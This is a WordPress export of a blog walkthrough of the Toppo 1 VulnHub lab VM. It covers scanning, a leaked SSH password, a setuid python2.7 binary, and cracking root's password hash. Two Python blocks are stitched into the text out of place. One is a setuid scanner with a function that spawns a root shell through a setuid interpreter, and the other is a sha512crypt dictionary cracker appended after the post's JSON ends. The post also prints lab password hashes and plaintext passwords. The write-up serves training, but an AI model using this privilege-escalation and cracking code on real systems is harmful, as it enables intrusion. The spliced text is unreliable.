{"id":266,"date":"2018-07-17T19:50:48","date_gmt":"2018-07-18T00:50:48","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=266"},"modified":"2019-08-28T10:31:18","modified_gmt":"2019-08-28T14:31:18","slug":"toppo-walkthrough","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/toppo-walkthrough\/","title":{"rendered":"Toppo 1 Walkthrough"},"content":{"rendered":"<p>This is a walkthrough of the Toppo 1 vulnerable VM. You can find it on VulnHub here: <a href=\"https:\/\/www.vulnhub.com\/entry\/toppo-1,245\/\">https:\/\/www.vulnhub.com\/entry\/toppo-1,245\/<\/a><\/p>\n<h1>Scanning<\/h1>\n<p>First, I&#8217;ll start by finding the VM&#8217;s IP address:<\/p>\n<pre>root ~ # netdiscover -i eth1 -r 10.10.1.0\/24\n\n Currently scanning: 10.10.1.0\/24   |   Screen View: Unique Hosts                                                                                            \n                                                                                                                                                             \n 3 Captured ARP Req\/Rep packets, from 3 hosts.   
Total size: 180                                                                                             \n __________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \n --------------------------------------------------------------------------\n 10.10.1.1       0a:00:27:00:00:02      1      60  Unknown vendor                                                                                            \n 10.10.1.10      08:00:27:18:25:ee      1      60  PCS Systemtechnik GmbH                                                                                    \n 10.10.1.100     08:00:27:36:07:36      1      60  PCS Systemtechnik GmbH<\/pre>\n<p><br class=\"\" \/>Now for some portscanning with nmap:<\/p>\n<pre>root ~ # nmap -sV -O 10.10.1.10\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2018-07-17 19:54 EDT\nNmap scan report for 10.10.1.10\nHost is up (0.00027s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE VERSION\n22\/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)\n80\/tcp  open  http    Apache httpd 2.4.10 ((Debian))\n111\/tcp open  rpcbind 2-4 (RPC #100000)\nMAC Address: 08:00:27:18:25:EE (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/pre>\n<h1><br class=\"\" \/>Enumeration<\/h1>\n<p>The interesting items here are that SSH &amp; Apache are running. 
First, I&#8217;ll check out the website:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo01.jpg\" alt=\"\" class=\"alignnone size-full wp-image-268\" width=\"676\" height=\"665\" srcset=\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo01.jpg 676w, https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo01-300x295.jpg 300w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/p>\n<p>I poked around the site for a bit and spidered the thing with Burp Suite but didn&#8217;t find anything terribly interesting. I decided to use <a href=\"https:\/\/github.com\/OJ\/gobuster\">Gobuster<\/a> for directory brute-forcing along with the &#8220;raft&#8221; wordlist I obtained from Daniel Miessler&#8217;s <a href=\"https:\/\/github.com\/danielmiessler\/SecLists\">SecLists<\/a> (FYI, RAFT is a discontinued web app proxy, but its wordlists were built by spidering the Internet&#8217;s robots.txt files. 
So a bunch of directories people don&#8217;t want you to see):<\/p>\n<pre>root ~ # gobuster -q -u http:\/\/10.10.1.10\/ -w \/usr\/share\/wordlists\/Web-Content\/raft-large-directories.txt -o gobuster.txt\n\/js (Status: 301)\n\/admin (Status: 301)\n\/css (Status: 301)\n\/img (Status: 301)\n\/mail (Status: 301)\n\/manual (Status: 301)\n\/vendor (Status: 301)\n\/LICENSE (Status: 200)<\/pre>\n<p><br class=\"\" \/>Of course, the most interesting result here is \/admin:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo02.jpg\" alt=\"\" class=\"alignnone size-full wp-image-269\" width=\"468\" height=\"284\" srcset=\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo02.jpg 468w, https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2018\/07\/Toppo02-300x182.jpg 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><\/p>\n<p>Hmm&#8230;<\/p>\n<pre>root ~ # curl 10.10.1.10\/admin\/notes.txt\nNote to myself :\n\nI need to change my password :\/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .<\/pre>\n<h1><br class=\"\" \/>Exploitation?<\/h1>\n<p>That was easy \ud83d\ude42 Let&#8217;s try to SSH in and take a stab at a username:<\/p>\n<pre>root ~ # ssh ted@10.10.1.10\nThe authenticity of host '10.10.1.10 (10.10.1.10)' can't be established.\nECDSA key fingerprint is SHA256:+i9tqbQwK978CB+XRr02pS6QPd3evJ+lueOkK1LTtU0.\nAre you sure you want to continue connecting (yes\/no)? 
yes\nWarning: Permanently added '10.10.1.10' (ECDSA) to the list of known hosts.\nted@10.10.1.10's password: \n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Jul 17 19:17:24 2018 from 10.10.1.2\nted@Toppo:~$ id\nuid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)\nted@Toppo:~$<\/pre>\n<h1><br class=\"\" \/>Privilege Escalation<\/h1>\n<p>I do believe that is the fastest I&#8217;ve ever gotten shell access to a machine. Anyway, next I&#8217;ll start poking around for privilege escalation. I like to use a couple of different enumeration scripts to check for potential paths for privescs. This time I&#8217;ll start with <a href=\"https:\/\/github.com\/sleventyeleven\/linuxprivchecker\">linuxprivchecker.py<\/a>. So I&#8217;ll execute this after SCPing it over to the VM. There&#8217;s a LOT of output so I&#8217;ll spare you the entirety of it. 
As I scrolled through, one section caught my interest:<\/p>\n<pre>[+] Shadow File (Privileged)\n    root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ\/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS\/bYsXmBjI0:17636:0:99999:7:::\n    daemon:*:17636:0:99999:7:::\n    bin:*:17636:0:99999:7:::\n    sys:*:17636:0:99999:7:::\n    sync:*:17636:0:99999:7:::\n    games:*:17636:0:99999:7:::\n    man:*:17636:0:99999:7:::\n    lp:*:17636:0:99999:7:::\n    mail:*:17636:0:99999:7:::\n    news:*:17636:0:99999:7:::\n    uucp:*:17636:0:99999:7:::\n    proxy:*:17636:0:99999:7:::\n    www-data:*:17636:0:99999:7:::\n    backup:*:17636:0:99999:7:::\n    list:*:17636:0:99999:7:::\n    irc:*:17636:0:99999:7:::\n    gnats:*:17636:0:99999:7:::\n    nobody:*:17636:0:99999:7:::\n    systemd-timesync:*:17636:0:99999:7:::\n    systemd-network:*:17636:0:99999:7:::\n    systemd-resolve:*:17636:0:99999:7:::\n    systemd-bus-proxy:*:17636:0:99999:7:::\n    Debian-exim:!:17636:0:99999:7:::\n    messagebus:*:17636:0:99999:7:::\n    statd:*:17636:0:99999:7:::\n    avahi-autoipd:*:17636:0:99999:7:::\n    sshd:*:17636:0:99999:7:::\n    ted:$6$U2\/Cun.m$A2eC7LBIW6D0eM1BPJWz6rSAGcnmfR\/OC4MkPmEIZbuANEaCuNK1KPedXRhkMZbxkek7NX0lfqFVWl.tyN.lL0:17636:0:99999:7:::<\/pre>\n<p><br class=\"\" \/>That&#8217;s odd. Is the shadow file world-readable?<\/p>\n<pre>ted@Toppo:~$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied<\/pre>\n<p><br class=\"\" \/>Nope. So how did the script output the contents? Let me just check another file permission:<\/p>\n<pre>ted@Toppo:~$ ls -l \/usr\/bin\/python2.7 \n-rwsrwxrwx 1 root root 3889608 Aug 13  2016 \/usr\/bin\/python2.7<\/pre>\n<p><br class=\"\" \/>And there we have it. A way in. Or rather, a way up. That mode string, -rwsrwxrwx, says the python2.7 binary is owned by root and has the SUID bit set, so whatever it runs gets an effective UID of 0 no matter who launched it (the real UID stays ted). That is how the script could read \/etc\/shadow: it ran under this interpreter, and the cat it spawned inherited euid 0. The same mode also makes the binary world-writable, so any local user could simply overwrite the interpreter with their own code. A grave security oversight, if I do say so myself. 
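The check a privesc script performs at this point, and what to do with a setuid interpreter once it is found, written out as an added example. This is not code from the post or from linuxprivchecker.py; the directory list in the `__main__` section and the fixture built by `build_sample_tree` (a temp dir with a fake setuid `python2.7`, a plain file and a symlink) are my own assumptions, constructed so the block runs offline as an unprivileged user:

```python
import os
import stat
import tempfile


def find_setuid(roots, owner_uid=None):
    """Walk each directory in `roots` and return (path, owner uid, ls-style mode)
    for every regular file with the setuid bit set. owner_uid=0 reports only
    root-owned binaries, the ones that matter for escalation; None reports any
    owner. Symlinks are skipped (lstat, no follow) so a link to a setuid binary
    is not double-counted and a link loop cannot hang the walk."""
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable: skip it, do not abort the scan
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                    continue
                if owner_uid is not None and st.st_uid != owner_uid:
                    continue
                hits.append((path, st.st_uid, stat.filemode(st.st_mode)))
    return sorted(hits)


def parse_ls_mode(mode):
    """Decode an `ls -l` mode string such as '-rwsrwxrwx' into the bits a
    privesc review cares about. 's' in the owner-execute slot is setuid plus
    execute, 'S' is setuid without execute (set but useless); same for setgid."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character ls mode string")
    return {
        "setuid": mode[3] in "sS",
        "setgid": mode[6] in "sS",
        "world_writable": mode[8] == "w",
    }


def escalate_if_possible(shell="/bin/bash"):
    """Meant to be run *through* the setuid interpreter. Bash resets its
    effective UID to the real UID when the two differ (unless started with -p),
    so pty.spawn alone drops back to the caller. Setting the real UID to 0
    first, which is allowed because euid is already 0, keeps the shell as root.
    Returns False when there is nothing to escalate; on success it never
    returns because exec replaces the process."""
    if os.geteuid() == 0 and os.getuid() != 0:
        os.setuid(0)
        os.execl(shell, shell)
    return False


def build_sample_tree():
    """Constructed fixture, not from the VM: a temp dir holding a setuid file,
    a plain executable and a symlink to the setuid file. Returns (root, setuid_path)."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    suid = os.path.join(bindir, "python2.7")
    plain = os.path.join(bindir, "ls")
    for p in (suid, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # -rwsr-xr-x: setuid, owner is whoever runs this
    os.chmod(plain, 0o755)   # -rwxr-xr-x: ordinary executable
    os.symlink(suid, os.path.join(bindir, "python"))  # must not be reported twice
    return root, suid


if __name__ == "__main__":
    # Real-world use: scan the usual binary locations for root-owned setuid files.
    for path, uid, mode in find_setuid(["/usr/bin", "/bin", "/usr/sbin", "/sbin"], owner_uid=0):
        flags = parse_ls_mode(mode)
        print(mode, uid, path, "WORLD-WRITABLE" if flags["world_writable"] else "")
```

On a real target, `find_setuid` with `owner_uid=0` gives the same list as `find / -perm -4000 -user root -type f 2>/dev/null`; the `parse_ls_mode` helper is there so an `ls -l` line pasted from a shell, like the one above, can be triaged the same way.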
At first, I tried just spawning a TTY from Python:<\/p>\n<pre>ted@Toppo:~$ python2.7 -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nbash-4.3$ whoami\nted<\/pre>\n<p><br class=\"\" \/>Drats. Bash resets its effective UID to the real UID whenever the two differ (unless it is started with -p), so the shell came back as ted even though python itself had euid 0; calling os.setuid(0) from python before spawning the shell would have sidestepped that. But I haven&#8217;t used a password cracker in a while, and I do have the hash of root&#8217;s password. I saved that first line from \/etc\/shadow to a file on my Kali machine called shadow.txt. I also saved the first line of \/etc\/passwd (root&#8217;s entry) to a file called passwd.txt. I&#8217;ll run unshadow on those and try to crack the password with John the Ripper&#8217;s default password list.<\/p>\n<pre>root ~\/Toppo # unshadow passwd.txt shadow.txt &gt; unshadow.txt\nroot ~\/Toppo # cat unshadow.txt \nroot:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ\/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS\/bYsXmBjI0:0:0:root:\/root:\/bin\/bash\nroot ~\/Toppo # john unshadow.txt \nWarning: detected hash type \"sha512crypt\", but the string is also recognized as \"crypt\"\nUse the \"--format=crypt\" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128\/128 SSE2 2x])\nPress 'q' or Ctrl-C to abort, almost any other key for status\ntest123          (root)\n1g 0:00:00:05 DONE 2\/3 (2018-07-17 19:45) 0.1838g\/s 198.3p\/s 198.3c\/s 198.3C\/s lacrosse..franklin\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed<\/pre>\n<p><br class=\"\" \/>That was a lot faster than I expected. &#8220;DONE 2\/3&#8221; means john finished in its second stage, the wordlist run, after about five seconds at roughly 200 guesses per second, so test123 sits near the top of the default password.lst; the 5,000 rounds of sha512crypt only matter when the password is not in the list. Let&#8217;s try it out:<\/p>\n<pre>ted@Toppo:~$ su -\nPassword: \nroot@Toppo:~# ls\nflag.txt\nroot@Toppo:~# cat flag.txt \n_________                                  \n|  _   _  |                                 \n|_\/ | | \\_|.--.   _ .--.   _ .--.    .--.   \n    | |  \/ .'`\\ \\[ '\/'`\\ \\[ '\/'`\\ \\\/ .'`\\ \\ \n   _| |_ | \\__. | | \\__\/ | | \\__\/ || \\__. | \n  |_____| '.__.'  | ;.__\/  | ;.__\/  '.__.'  
\n                 [__|     [__|              \n\n\n\n\nCongratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}<\/pre>\n<p>Great success!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a walkthrough of the Toppo 1 vulnerable VM. You can find it on VulnHub here: https:\/\/www.vulnhub.com\/entry\/toppo-1,245\/ Scanning First, I&#8217;ll start by finding the VM&#8217;s IP address: root ~<a href=\"https:\/\/blog.lamarranet.com\/index.php\/toppo-walkthrough\/\" class=\"more-link\"><span class=\"readmore\">Continue reading<span class=\"screen-reader-text\">Toppo 1 Walkthrough<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-266","post","type-post","status-publish","format-standard","hentry","category-vulnhub"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=266"}],"version-history":[{"count":9,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266\/revisions"}],"predecessor-version":[{"id":282,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266\/revisions\/282"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=266"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=266"},{"taxonomy":"post_t
ag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=266"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
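The cracking step in the walkthrough above (john against root's sha512crypt hash), worked as an added example that is not part of the original post. It implements glibc's `$6$` scheme in pure Python from hashlib so the hash in root's shadow line can be re-checked without john, and runs a tiny dictionary attack over shadow lines. The shadow line is the one printed in the post; the wordlist is a constructed stand-in for john's password.lst, and the helper names are my own:

```python
import hashlib

# Root's shadow entry exactly as shown in the walkthrough (salt 5UK1sFDk, default 5000 rounds).
ROOT_SHADOW_LINE = ("root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4"
                    "KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::")

# Constructed mini wordlist standing in for john's default password.lst.
SAMPLE_WORDLIST = ["password", "123456", "qwerty", "letmein", "test123", "toppo"]

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _fit(block, length):
    """Repeat `block` and cut it to exactly `length` bytes (the spec's P and S expansion)."""
    return block * (length // len(block)) + block[: length % len(block)]


def sha512_crypt(password, salt, rounds=5000):
    """glibc sha512crypt (Drepper's $6$ scheme). Returns the full '$6$[rounds=N$]salt$hash'."""
    def h(*parts):
        return hashlib.sha512(b"".join(parts)).digest()

    pw = password.encode()
    salt_b = salt[:16].encode()                      # glibc caps the salt at 16 characters
    b = h(pw, salt_b, pw)                            # digest B
    a_in = pw + salt_b + _fit(b, len(pw))
    n = len(pw)
    while n:                                         # bits of len(pw), least significant first
        a_in += b if n & 1 else pw
        n >>= 1
    a = h(a_in)                                      # digest A
    p = _fit(h(pw * len(pw)), len(pw))               # P, derived from DP
    s = _fit(h(salt_b * (16 + a[0])), len(salt_b))   # S, derived from DS
    c = a
    for i in range(rounds):                          # the part that makes guessing slow
        buf = p if i & 1 else c
        if i % 3:
            buf += s
        if i % 7:
            buf += p
        buf += c if i & 1 else p
        c = h(buf)
    out = []
    for k in range(21):                              # 63 bytes emitted in permuted triples
        i0 = (22 * k) % 63
        w = (c[i0] << 16) | (c[(i0 + 21) % 63] << 8) | c[(i0 + 42) % 63]
        for _ in range(4):
            out.append(_B64[w & 0x3F])
            w >>= 6
    w = c[63]                                        # final byte becomes two characters
    for _ in range(2):
        out.append(_B64[w & 0x3F])
        w >>= 6
    prefix = "$6$" + ("rounds=%d$" % rounds if rounds != 5000 else "")
    return prefix + salt_b.decode() + "$" + "".join(out)


def parse_shadow_hash(hashfield):
    """Split '$6$[rounds=N$]salt$hash' into (rounds, salt)."""
    parts = hashfield.split("$")
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt field")
    rounds, idx = 5000, 2
    if parts[2].startswith("rounds="):
        rounds, idx = int(parts[2][len("rounds="):]), 3
    return rounds, parts[idx]


def crack_shadow_line(line, wordlist):
    """Dictionary attack on one /etc/shadow line. Returns (user, password) or (user, None).
    Locked (*, !) entries are skipped. Only the hash segment is compared, so an
    explicit 'rounds=5000$' in the field does not cause a false miss."""
    user, hashfield = line.split(":", 2)[:2]
    if hashfield in ("", "*") or hashfield.startswith("!"):
        return user, None
    rounds, salt = parse_shadow_hash(hashfield)
    target = hashfield.rsplit("$", 1)[1]
    for candidate in wordlist:
        if sha512_crypt(candidate, salt, rounds).rsplit("$", 1)[1] == target:
            return user, candidate
    return user, None


if __name__ == "__main__":
    print(crack_shadow_line(ROOT_SHADOW_LINE, SAMPLE_WORDLIST))
```

Each candidate costs 5,000 SHA-512 calls, which is why john reported only about 200 guesses per second; a weak password still falls immediately because the cost is per guess, not per list.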